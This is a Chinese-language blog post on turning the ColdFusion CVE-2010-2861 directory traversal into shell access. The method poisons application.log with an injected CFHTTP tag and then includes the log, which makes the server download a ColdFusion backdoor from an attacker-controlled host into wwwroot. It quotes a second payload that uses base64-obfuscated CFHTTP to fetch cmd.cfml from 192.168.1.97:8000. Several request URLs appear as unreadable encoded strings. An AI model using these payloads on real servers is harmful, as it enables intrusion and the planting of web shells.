最近看老外的一篇文章说，CVE-2010-2861这个利用方法，只有看到过通过读取password.properties里的password字段，破解SHA-1值登陆后台，或者通过传递哈希登陆后台的，还没见过能直接得到SHELL的。其实我以前和小伙伴讨论过利用application.log本地包含CFM的方法，当时的利用方法是这样的：

首先看看application.log有没有在默认的目录：

e81K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5H3i4K6u0W2x3e0S2Q4x3X3f1I4z5o6m8Q4x3X3f1J5x3#2)9K6b7e0R3#2x3o6m8Q4x3V1k6Q4x3V1k6o6c8V1W2p5c8g2)9J5c8X3q4V1L8h3W2F1K9i4y4@1M7X3q4@1L8%4u0Q4x3V1k6W2L8Y4c8W2M7W2)9J5k6h3y4X3L8g2)9K6c8X3I4G2j5$3q4D9k6g2)9K6c8q4)9J5k6g2)9J5k6g2)9#2b7#2)9J5k6g2)9J5k6g2)9#2b7#2)9J5k6g2)9J5k6g2)9#2b7#2)9J5k6g2)9J5k6g2)9#2b7#2)9J5k6g2)9J5k6g2)9#2b7#2)9J5k6g2)9J5k6g2)9#2b7#2)9J5k6g2)9J5k6g2)9#2b7#2)9J5k6g2)9J5k6g2)9#2b7@1y4G2L8r3c8r3N6i4y4A6L8$3^5^5i4K6g2o6L8r3!0Y4M7#2)9#2b7$3q4H3M7r3I4A6j5$3q4@1K9h3!0F1i4K6u0W2L8r3!0Y4i4K6t1#2x3o6m8W2L8R3`.`.

然后访问一个不存在的页面，注意编码问题，否则不成功的。

719K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0M7J5i4K6u0W2x3e0b7I4i4K6y4m8z5o6f1H3x3q4)9J5c8W2)9J5y4e0y4o6b7@1k6t1g2q4c8b7i4K6t1#2x3U0m8y4c8g2c8t1e0@1c8Q4x3U0f1K6c8p5N6W2N6q4)9J5y4e0t1H3g2g2u0x3i4K6t1#2x3@1c8Q4x3U0f1J5x3#2g2d9e0q4)9J5k6i4g2Q4x3U0f1J5x3#2)9J5y4e0t1H3f1p5q4f1d9q4)9J5y4e0y4p5i4K6t1#2x3U0y4g2f1V1I4Q4x3X3g2H3i4K6t1#2x3U0y4Q4x3U0f1J5x3p5k6u0e0p5g2Q4x3U0f1K6c8q4)9J5y4e0t1K6g2g2u0x3i4K6u0W2k6W2)9J5y4e0t1K6i4K6t1#2x3@1g2Q4x3X3g2U0k6X3#2D9

这时候就会把<CFHTTP METHOD=Get URL=#URL.u# PATH=#URL.p# FILE=#URL.f#>注入到application.log里了，看下图：

最后我们访问

dc8K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5H3i4K6u0W2x3e0S2Q4x3X3f1I4z5o6m8Q4x3X3f1J5x3#2)9K6b7e0R3#2x3o6m8Q4x3V1k6Q4x3V1k6o6c8V1W2p5c8g2)9J5c8X3q4V1L8h3W2F1K9i4y4@1M7X3q4@1L8%4u0Q4x3V1k6W2L8Y4c8W2M7W2)9J5k6h3y4X3L8g2)9K6c8X3I4G2j5$3q4D9k6g2)9K6c8q4)9J5k6g2)9J5k6g2)9J5k6g2)9J5k6g2)9J5k6g2)9J5k6g2)9J5k6g2)9J5k6g2)9J5k6g2)9J5k6g2)9J5k6g2)9J5k6g2)9J5k6g2)9J5k6g2)9J5k6g2)9J5k6g2)9#2b7@1y4G2L8r3c8r3N6i4y4A6L8$3^5^5i4K6g2o6L8r3!0Y4M7#2)9#2b7$3q4H3M7r3I4A6j5$3q4@1K9h3!0F1i4K6u0W2L8r3!0Y4i4K6t1#2x3o6m8W2L8W2)9J5y4X3q4E0M7q4)9K6b7Y4g2Q4x3@1c8Z5N6s2c8H3i4K6y4m8i4K6u0r3i4K6u0r3x3e0m8Q4x3X3f1I4z5q4)9J5k6e0p5^5x3q4)9J5k6e0t1H3i4K6u0r3k6s2k6%4j5g2)9J5c8X3S2S2j5$3E0S2j5X3I4W2i4K6u0r3N6i4m8D9L8$3q4V1M7#2)9J5c8Y4S2D9i4K6u0W2N6s2S2@1i4K6t1$3j5h3#2H3i4K6y4n7M7q4)9K6c8p5y4Q4x3@1q4Q4y4f1y4o6L8$3I4V1c8Y4g2K6K9h3!0F1z5q4)9#2b7%4N6%4N6%4u0G2L8%4c8Q4x3U0k6S2L8i4m8Q4x3@1u0X3i4K6y4p5M7$3S2W2L8r3I4Q4x3X3g2U0k6X3@1`.

就会从10.18.180.20上把xl.txt的CF后门脚本下载到目标机器的c:\ColdFusion8\wwwroot目录了。

我们看看老外用的方法：思路都是一样的，就是他的payload选择的是

<cfhttp method='get' url='#ToString(ToBinary('aHR0cDovLzE5Mi4xNjguMS45Nzo4MDAwL2NtZC5jZm1s'))#' path='#ExpandPath(ToString(ToBinary('Li4vLi4v')))#' file='cmd.cfml'>

使用cfm的CFHTTP标签执行一个HTTP请求来取得192.168.1.97:8000 WEB服务器上的cmd.cfml文件，ToString(ToBinary是为了做BASE64编码，绕过一些字符的限制，比如/

下面说说此法的缺点：

1.不是通杀的方法，如果对方禁止对外的HTTP访问，此法不行 
2.如果安装的时候是集成到IIS模式的，CF程序目录放到其他盘符的话，是没法使用../跨目录的